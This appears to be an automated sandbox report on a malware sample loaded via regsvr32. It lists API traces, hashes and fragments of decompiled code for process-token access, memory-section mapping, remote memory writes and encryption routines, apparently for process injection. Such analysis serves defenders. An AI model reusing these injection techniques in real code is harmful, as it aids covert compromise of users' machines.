                0x031f7992
                0x031f7992
                0x031f7995
                0x031f799b
                0x031f79a1
                0x031f79a1
                0x031f79a9
                0x031f79ad
                0x031f79b0
                0x031f7a57
                0x031f79b6
                0x031f79bc
                0x031f79bf
                0x031f79c2
                0x031f79c4
                0x031f79c7
                0x031f79ca
                0x031f79cc
                0x031f79cc
                0x031f79d6
                0x031f79db
                0x031f79de
                0x031f79e1
                0x031f79e3
                0x031f79ec
                0x031f7a16
                0x031f79ee
                0x031f79ff
                0x031f79ff
                0x031f7a1e
                0x00000000
                0x00000000
                0x031f7a20
                0x031f7a23
                0x031f7a26
                0x031f7a2a
                0x00000000
                0x031f7a2c
                0x031f7a3b
                0x031f7a41
                0x031f7a49
                0x031f7a49
                0x00000000
                0x031f7a2a
                0x031f7a2e
                0x031f7a36
                0x031f7a39
                0x031f7a50
                0x00000000
                0x00000000
                0x00000000
                0x031f7a39
                0x031f79b0
                0x031f7a69
                0x031f7a6c
                0x031f7a6c
                0x031f7a81
                0x031f7a81
                0x031f7a99

                APIs
                • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000018,F0000000,?,00000110,031F7307), ref: 031F792A
                • memcpy.NTDLL(?,031F7307,00000010,?,?,?,?,?,?,?,?,?,?,031F1ACD,00000000,031F4F92), ref: 031F7943
                • CryptImportKey.ADVAPI32(00000000,?,0000001C,00000000,00000000,?), ref: 031F796C
                • CryptSetKeyParam.ADVAPI32(?,00000001,?,00000000), ref: 031F7984
                • memcpy.NTDLL(00000000,031F4F92,031F7307,0000011F), ref: 031F79D6
                • CryptEncrypt.ADVAPI32(?,00000000,00000000,00000000,00000000,031F7307,00000020,?,?,0000011F), ref: 031F79FF
                • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,00000000,031F7307,?,?,0000011F), ref: 031F7A16
                • GetLastError.KERNEL32(?,?,0000011F), ref: 031F7A2E
                • GetLastError.KERNEL32 ref: 031F7A60
                • CryptDestroyKey.ADVAPI32(?), ref: 031F7A6C
                • GetLastError.KERNEL32 ref: 031F7A74
                • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 031F7A81
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,031F1ACD,00000000,031F4F92,031F7307,?,031F7307), ref: 031F7A89
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDecryptDestroyEncryptImportParamRelease
                • String ID:
                • API String ID: 1967744295-0
                • Opcode ID: 69c9f192f710221c404aa80caf066945fa85468d5edd4b313cc1ebb16e19f9b9
                • Instruction ID: ae40e6cb8cc4e62f0abd3c262e4179838ce38abf7a603f4e75eb66014488f48f
                • Opcode Fuzzy Hash: 69c9f192f710221c404aa80caf066945fa85468d5edd4b313cc1ebb16e19f9b9
                • Instruction Fuzzy Hash: 72518071900209FFDF14DFA4DC84AEEBBB9FB48390F094529FA15E6280D7358A948F61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BC8C50 Relevance: 10.6, APIs: 7, Instructions: 113stringCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 376 4bc8c50-4bc8c62 377 4bc8c6c 376->377 378 4bc8c64-4bc8c6a 376->378 379 4bc8c72-4bc8c86 call 4bd28fe 377->379 378->379 382 4bc8c88-4bc8c96 StrRChrA 379->382 383 4bc8cc2-4bc8cec call 4bcd4f4 379->383 384 4bc8c98-4bc8c99 382->384 385 4bc8c9b 382->385 390 4bc8cee-4bc8cf2 383->390 391 4bc8d0a-4bc8d12 383->391 387 4bc8ca1-4bc8cbc _strupr lstrlen call 4bdd697 384->387 385->387 387->383 390->391 395 4bc8cf4-4bc8cff 390->395 392 4bc8d19-4bc8d37 CreateEventA 391->392 393 4bc8d14-4bc8d17 391->393 397 4bc8d39-4bc8d40 call 4bc34ea 392->397 398 4bc8d6b-4bc8d71 GetLastError 392->398 396 4bc8d77-4bc8d7e 393->396 395->391 399 4bc8d01-4bc8d08 395->399 402 4bc8d8d-4bc8d92 396->402 403 4bc8d80-4bc8d87 RtlRemoveVectoredExceptionHandler 396->403 397->398 405 4bc8d42-4bc8d49 397->405 401 4bc8d73-4bc8d75 398->401 399->391 399->399 401->396 401->402 403->402 406 4bc8d5c-4bc8d5f call 4bd4560 405->406 407 4bc8d4b-4bc8d57 RtlAddVectoredExceptionHandler 405->407 409 4bc8d64-4bc8d69 406->409 407->406 409->398 409->401
                APIs
                • StrRChrA.SHLWAPI(0624B5B0,00000000,0000005C,?,?,?), ref: 04BC8C8C
                • _strupr.NTDLL ref: 04BC8CA2
                • lstrlen.KERNEL32(0624B5B0,?,?), ref: 04BC8CAA
                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?), ref: 04BC8D2A
                • RtlAddVectoredExceptionHandler.NTDLL(00000000,04BC44E1), ref: 04BC8D51
                • GetLastError.KERNEL32(?,?,?,?), ref: 04BC8D6B
                • RtlRemoveVectoredExceptionHandler.NTDLL(04C005B8), ref: 04BC8D81
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: ExceptionHandlerVectored$CreateErrorEventLastRemove_struprlstrlen
                • String ID:
                • API String ID: 2251957091-0
                • Opcode ID: 8dcff40dbf0b2cbcfefed2cfccfe46f0b45ea15a0b82a67120366756b5167953
                • Instruction ID: 62ca540361c6780271d51a8dd88578c8a4bb9310c781666c4c4a05591b7cab5f
                • Opcode Fuzzy Hash: 8dcff40dbf0b2cbcfefed2cfccfe46f0b45ea15a0b82a67120366756b5167953
                • Instruction Fuzzy Hash: 82310A729001159FEB20BF79ACC492EB7A5E784302F0545AFE912DB181D739EC809BB1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BCD4F4 Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                Download Yara Rule

                Control-flow Graph

                APIs
                • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 04BCD53B
                • NtOpenProcessToken.NTDLL(?,00000008,?), ref: 04BCD54E
                • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,?), ref: 04BCD56A
                  • Part of subcall function 04BC8F9E: RtlAllocateHeap.NTDLL(00000000,?,04BC2180), ref: 04BC8FAA
                • NtQueryInformationToken.NTDLL(?,00000001,00000000,?,?), ref: 04BCD587
                • memcpy.NTDLL(?,00000000,0000001C), ref: 04BCD594
                • NtClose.NTDLL(?), ref: 04BCD5A6
                • NtClose.NTDLL(?), ref: 04BCD5B0
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                • String ID:
                • API String ID: 2575439697-0
                • Opcode ID: 8ad03b73d34e899e3971d585431b26919280d6bc65946b8b80829a50d00d21f5
                • Instruction ID: b86f495e739a41615ea1ce9dba6fcb637f72b617f898feb75dc5b66bd7135621
                • Opcode Fuzzy Hash: 8ad03b73d34e899e3971d585431b26919280d6bc65946b8b80829a50d00d21f5
                • Instruction Fuzzy Hash: 3E211672900229BFDF01AF95CC85ADEBFBDEF48744F104066F904EA150D7719A409BA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 031F373D Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                Download Yara Rule

                Control-flow Graph

                C-Code - Quality: 38%
                			E031F373D(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E031F2114(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E031F2C11(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















                0x031f374a
                0x031f374b
                0x031f374c
                0x031f374d
                0x031f374e
                0x031f3752
                0x031f3759
                0x031f3768
                0x031f376b
                0x031f376e
                0x031f3775
                0x031f3778
                0x031f377b
                0x031f377e
                0x031f3781
                0x031f378c
                0x031f378e
                0x031f3797
                0x031f379f
                0x031f37a1
                0x031f37b3
                0x031f37bd
                0x031f37c1
                0x031f37d0
                0x031f37d4
                0x031f37dd
                0x031f37e5
                0x031f37e5
                0x031f37e7
                0x031f37e7
                0x031f37ef
                0x031f37f5
                0x031f37f9
                0x031f37f9
                0x031f3804

                APIs
                • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 031F3784
                • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 031F3797
                • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 031F37B3
                  • Part of subcall function 031F2114: RtlAllocateHeap.NTDLL(00000000,00000000,031F6F72), ref: 031F2120
                • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 031F37D0
                • memcpy.NTDLL(?,00000000,0000001C), ref: 031F37DD
                • NtClose.NTDLL(?), ref: 031F37EF
                • NtClose.NTDLL(00000000), ref: 031F37F9
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                • String ID:
                • API String ID: 2575439697-0
                • Opcode ID: b545be8b49dc19245a573ef949e4b780e1e300174583db63b76e6ec3160ef1f0
                • Instruction ID: 18c6220736652402e05262db1ca54c5d8a10abfa93585692e45235d42e4a5823
                • Opcode Fuzzy Hash: b545be8b49dc19245a573ef949e4b780e1e300174583db63b76e6ec3160ef1f0
                • Instruction Fuzzy Hash: 912105B6900218BFDB01EFA5CC45ADEBFBDEB0C750F104062FA04A6150D7728A919BA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BCAFD1 Relevance: 9.1, APIs: 6, Instructions: 94threadmemorynativeCOMMON
                Download Yara Rule
                APIs
                • GetSystemTimeAsFileTime.KERNEL32(?), ref: 04BCAFFC
                • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 04BCB009
                • NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 04BCB095
                • GetModuleHandleA.KERNEL32(00000000), ref: 04BCB0A0
                • RtlImageNtHeader.NTDLL(00000000), ref: 04BCB0A9
                • RtlExitUserThread.NTDLL(00000000), ref: 04BCB0BE
                  • Part of subcall function 04BE3AA2: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,04BCB037,?), ref: 04BE3AAA
                  • Part of subcall function 04BE3AA2: GetVersion.KERNEL32 ref: 04BE3AB9
                  • Part of subcall function 04BE3AA2: GetCurrentProcessId.KERNEL32 ref: 04BE3AD0
                  • Part of subcall function 04BE3AA2: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 04BE3AED
                  • Part of subcall function 04BD7B55: memcpy.NTDLL(00000000,00000000,?,?,00000000,00000001,?,?,00000000,?,?,?,?,?,04BCB045,?), ref: 04BD7BB4
                  • Part of subcall function 04BCE9B0: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,04BDBCFE), ref: 04BCE9D6
                  • Part of subcall function 04BCAEC5: GetModuleHandleA.KERNEL32(?,?,?,?,?,04BC1DC6,00000000), ref: 04BCAEE6
                  • Part of subcall function 04BCAEC5: GetProcAddress.KERNEL32(00000000,?), ref: 04BCAEFF
                  • Part of subcall function 04BCAEC5: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,04BC1DC6,00000000), ref: 04BCAF1C
                  • Part of subcall function 04BCAEC5: IsWow64Process.KERNEL32(?,?,?,?,?,?,04BC1DC6,00000000), ref: 04BCAF2D
                  • Part of subcall function 04BCAEC5: CloseHandle.KERNEL32(?,?,?,?,04BC1DC6,00000000), ref: 04BCAF40
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Process$HandleModule$CreateFileOpenThreadTime$AddressCloseCurrentEventExitHeaderHeapImageInformationNameProcQuerySystemUserVersionWow64memcpy
                • String ID:
                • API String ID: 3675227105-0
                • Opcode ID: df1f07bbd51cd7c1c0342c55fcf58fc18ac16bdbcdccbe757670d002a5ff5122
                • Instruction ID: ac519cc1d4b84c38c3f696d38391b2ff40b030a0c5149ea2bac72e668030340a
                • Opcode Fuzzy Hash: df1f07bbd51cd7c1c0342c55fcf58fc18ac16bdbcdccbe757670d002a5ff5122
                • Instruction Fuzzy Hash: DA319171900118AFCB21EF75ECC5A6E77A4EB84754F1041AAE561EB141D734AD44CBB1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BCA7FE Relevance: 7.7, APIs: 5, Instructions: 234nativeCOMMON
                Download Yara Rule
                APIs
                • memcpy.NTDLL(?,04BC48CA,00000800,?,?,00000000,00000000), ref: 04BCAA3F
                  • Part of subcall function 04BC87CD: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,?,04BCA90D,?,?,?,00000000,00000000), ref: 04BC87F2
                  • Part of subcall function 04BC87CD: GetProcAddress.KERNEL32(00000000,?), ref: 04BC8814
                  • Part of subcall function 04BC87CD: GetProcAddress.KERNEL32(00000000,?), ref: 04BC882A
                  • Part of subcall function 04BC87CD: GetProcAddress.KERNEL32(00000000,?), ref: 04BC8840
                  • Part of subcall function 04BC87CD: GetProcAddress.KERNEL32(00000000,?), ref: 04BC8856
                  • Part of subcall function 04BC87CD: GetProcAddress.KERNEL32(00000000,?), ref: 04BC886C
                  • Part of subcall function 04BD0FE0: NtMapViewOfSection.NTDLL(00000000,000000FF,04BDBF30,00000000,00000000,04BDBF30,00000000,00000002,00000000,?,?,00000000,04BDBF30,000000FF,00000000), ref: 04BD100E
                  • Part of subcall function 04BE3C23: memcpy.NTDLL(?,?,?,?,?,?,04BCC6EC,04BCC6EC,?,?,?,00000000,00000000), ref: 04BE3C89
                  • Part of subcall function 04BE3C23: memcpy.NTDLL(00000000,?,?), ref: 04BE3CE8
                • memcpy.NTDLL(?,?,?,?,?,04BCC6EC,04BCC6EC,04BCC6EC,?,?,?,00000000,00000000), ref: 04BCA96C
                • memcpy.NTDLL(?,?,00000018,?,?,04BCC6EC,04BCC6EC,04BCC6EC,?,?,?,00000000,00000000), ref: 04BCA9B8
                • NtUnmapViewOfSection.NTDLL(000000FF,00000000,00000000,00000000), ref: 04BCAA7D
                • memset.NTDLL ref: 04BCAABF
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: AddressProcmemcpy$SectionView$HandleModuleUnmapmemset
                • String ID:
                • API String ID: 1575695328-0
                • Opcode ID: 40ad7a02566979ba8ef6992f5896cc58bf6358c70a5e77fc88ef82b366c9dd24
                • Instruction ID: bf6c0a6ef5c6af6d42ae34394071ee872a934fa1a2ac8f0bc650a42ed3e5e07c
                • Opcode Fuzzy Hash: 40ad7a02566979ba8ef6992f5896cc58bf6358c70a5e77fc88ef82b366c9dd24
                • Instruction Fuzzy Hash: 33913871A0020AEFDB10DF99C9C4BAEBBB4FF08304F1445ADE811A7250E775BA95DB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BDBEBC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71nativeCOMMON
                Download Yara Rule
                APIs
                • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74E04EE0,00000000,00000000), ref: 04BDBF19
                  • Part of subcall function 04BD0FE0: NtMapViewOfSection.NTDLL(00000000,000000FF,04BDBF30,00000000,00000000,04BDBF30,00000000,00000002,00000000,?,?,00000000,04BDBF30,000000FF,00000000), ref: 04BD100E
                • memset.NTDLL ref: 04BDBF3D
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Section$CreateViewmemset
                • String ID: @
                • API String ID: 2533685722-2766056989
                • Opcode ID: 563252fa79f553973f86358bcab1ca50d31ef9bbd93477e3025e744de34ab300
                • Instruction ID: fb95fab5400bd0269f5b1889f063e0d85e469862e1f89fc1fd284a30d91ab475
                • Opcode Fuzzy Hash: 563252fa79f553973f86358bcab1ca50d31ef9bbd93477e3025e744de34ab300
                • Instruction Fuzzy Hash: 73210E75D04209AFDB11DFA9C884DEEFBF9EB48354F1045A9E615F3250E730AA448F60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BCE4DC Relevance: 4.7, APIs: 3, Instructions: 168librarynativeloaderCOMMON
                Download Yara Rule
                APIs
                • GetProcAddress.KERNEL32(?,00000318), ref: 04BCE501
                • NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 04BCE51D
                  • Part of subcall function 04BC8F9E: RtlAllocateHeap.NTDLL(00000000,?,04BC2180), ref: 04BC8FAA
                  • Part of subcall function 04BCB45A: GetProcAddress.KERNEL32(?,00000000), ref: 04BCB483
                  • Part of subcall function 04BCB45A: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,04BCE55E,00000000,00000000,00000028,00000100), ref: 04BCB4A5
                • StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 04BCE687
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: AddressProcWow64$AllocateHeapInformationMemory64Process64QueryReadVirtual
                • String ID:
                • API String ID: 3547194813-0
                • Opcode ID: 36ae3f760aa42676b7e742b9884a64ae2227031d289d7bbdfb043be859b6911a
                • Instruction ID: 677161ef2109871818f0cd49e83580891b1373face0e9a488d7650f4b3280ad0
                • Opcode Fuzzy Hash: 36ae3f760aa42676b7e742b9884a64ae2227031d289d7bbdfb043be859b6911a
                • Instruction Fuzzy Hash: 69613C71A1020AEFDB14DFA8C980BAEBBB4FF08304F0045A9E915EB251D770F955CBA4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BC6F70 Relevance: 4.6, APIs: 3, Instructions: 56librarynativeloaderCOMMON
                Download Yara Rule
                APIs
                • memset.NTDLL ref: 04BC6F84
                • GetProcAddress.KERNEL32(?), ref: 04BC6FAC
                • NtWow64QueryInformationProcess64.NTDLL(?,00000000,?,00000030,00000000,?,00001000,00000000), ref: 04BC6FCA
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: AddressInformationProcProcess64QueryWow64memset
                • String ID:
                • API String ID: 2968673968-0
                • Opcode ID: 15d000d64738ed6ef73021e67e0ea6f066b984b56ee5d1e0beb46a0399cfeac9
                • Instruction ID: d7d26c29bc2bd978787b49165a47feebba8c4acd98c12b1a2e7989d43b7c5978
                • Opcode Fuzzy Hash: 15d000d64738ed6ef73021e67e0ea6f066b984b56ee5d1e0beb46a0399cfeac9
                • Instruction Fuzzy Hash: 18112E31A00219AFEB10DF99DC85F99B7B9EB84704F054069F908EB291EB74ED15CB71
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BE3E7D Relevance: 4.5, APIs: 3, Instructions: 29memorynativeCOMMON
                Download Yara Rule
                APIs
                • NtAllocateVirtualMemory.NTDLL(04BD6359,00000000,00000000,04BD6359,00003000,00000040), ref: 04BE3EAE
                • RtlNtStatusToDosError.NTDLL(00000000), ref: 04BE3EB5
                • SetLastError.KERNEL32(00000000), ref: 04BE3EBC
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Error$AllocateLastMemoryStatusVirtual
                • String ID:
                • API String ID: 722216270-0
                • Opcode ID: d25703a47c19e9ea18ccbd4f7d14cc7c891c21e17007ea382935464015ad2f42
                • Instruction ID: f722d7c21e4caedd534baaf22c5baf546c58e1a73113c06ca06ce2b6e0ff2db7
                • Opcode Fuzzy Hash: d25703a47c19e9ea18ccbd4f7d14cc7c891c21e17007ea382935464015ad2f42
                • Instruction Fuzzy Hash: 29F0FE71910309FBEB05DB95D909BAE77BCEB44345F104048A604AB080EBB8AB04DB75
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BD70AC Relevance: 4.5, APIs: 3, Instructions: 26nativeCOMMON
                Download Yara Rule
                APIs
                • NtWriteVirtualMemory.NTDLL(00000318,00000000,00000000,?,04BD63FB,00000000,?,04BD63FB,?,00000000,00000000,00000318,00000020,?,00010003,?), ref: 04BD70CA
                • RtlNtStatusToDosError.NTDLL(C0000002), ref: 04BD70D9
                • SetLastError.KERNEL32(00000000,?,04BD63FB,?,00000000,00000000,00000318,00000020,?,00010003,?,?,00000318,00000008), ref: 04BD70E0
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Error$LastMemoryStatusVirtualWrite
                • String ID:
                • API String ID: 1089604434-0
                • Opcode ID: 5d8c70820243cbf5b4ef930f6869464a9622f0206e18466b66aa68541d166b54
                • Instruction ID: b72f89290ceead8704af01adf310244d62117716d83ce86ed46f7a5b4351ae73
                • Opcode Fuzzy Hash: 5d8c70820243cbf5b4ef930f6869464a9622f0206e18466b66aa68541d166b54
                • Instruction Fuzzy Hash: 64E04F3620021AEBCF015EE9ED04DDB7BADEB4C740B004061BE05D7160EB36DC20ABB0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 031F2F8D Relevance: 3.1, APIs: 2, Instructions: 70nativeCOMMON
                Download Yara Rule
                C-Code - Quality: 72%
                			E031F2F8D(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E031F4AAF(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}


















                0x031f2f96
                0x031f2f9d
                0x031f2f9e
                0x031f2f9f
                0x031f2fa0
                0x031f2fa1
                0x031f2fb2
                0x031f2fb6
                0x031f2fca
                0x031f2fcd
                0x031f2fd0
                0x031f2fd7
                0x031f2fda
                0x031f2fe1
                0x031f2fe4
                0x031f2fe7
                0x031f2fea
                0x031f2fef
                0x031f302a
                0x031f2ff1
                0x031f2ff4
                0x031f2ffa
                0x031f2fff
                0x031f3003
                0x031f3021
                0x031f3005
                0x031f300c
                0x031f301a
                0x031f301a
                0x031f3003
                0x031f3032

                APIs
                • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74E04EE0,00000000,00000000,031F22B9), ref: 031F2FEA
                  • Part of subcall function 031F4AAF: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,031F2FFF,00000002,00000000,?,?,00000000,?,?,031F2FFF,00000000), ref: 031F4ADC
                • memset.NTDLL ref: 031F300C
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: Section$CreateViewmemset
                • String ID:
                • API String ID: 2533685722-0
                • Opcode ID: d7bc0329ad1286e6220c1ba02e4eb2ff034c4f1901b0d50070db802167d6fe14
                • Instruction ID: a99d4fbb88ff7b972e3e2ee6e91a3ebfec47a59cc7ca602a56b20b401a177891
                • Opcode Fuzzy Hash: d7bc0329ad1286e6220c1ba02e4eb2ff034c4f1901b0d50070db802167d6fe14
                • Instruction Fuzzy Hash: 44211DB5D0020DAFDB11DFA9C8849DFFBB9EF48354F10486AE655F7210D7319A448B64
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BCB45A Relevance: 3.0, APIs: 2, Instructions: 35librarynativeloaderCOMMON
                Download Yara Rule
                APIs
                • GetProcAddress.KERNEL32(?,00000000), ref: 04BCB483
                • NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,04BCE55E,00000000,00000000,00000028,00000100), ref: 04BCB4A5
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: AddressMemory64ProcReadVirtualWow64
                • String ID:
                • API String ID: 752694512-0
                • Opcode ID: 44b40f64b3daa801647c82536ae68b57a3757b59b09d6d4bef6127b08dbfff5e
                • Instruction ID: 883b692db96fcdddce7b075a3db31d0606c17dd316240cde7f1823a4b0b750cc
                • Opcode Fuzzy Hash: 44b40f64b3daa801647c82536ae68b57a3757b59b09d6d4bef6127b08dbfff5e
                • Instruction Fuzzy Hash: DAF04971604109AF9F018F8ADC81C9EBBBAEBC8320B10415AF614CB120D735E951DF20
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BD0FE0 Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                Download Yara Rule
                APIs
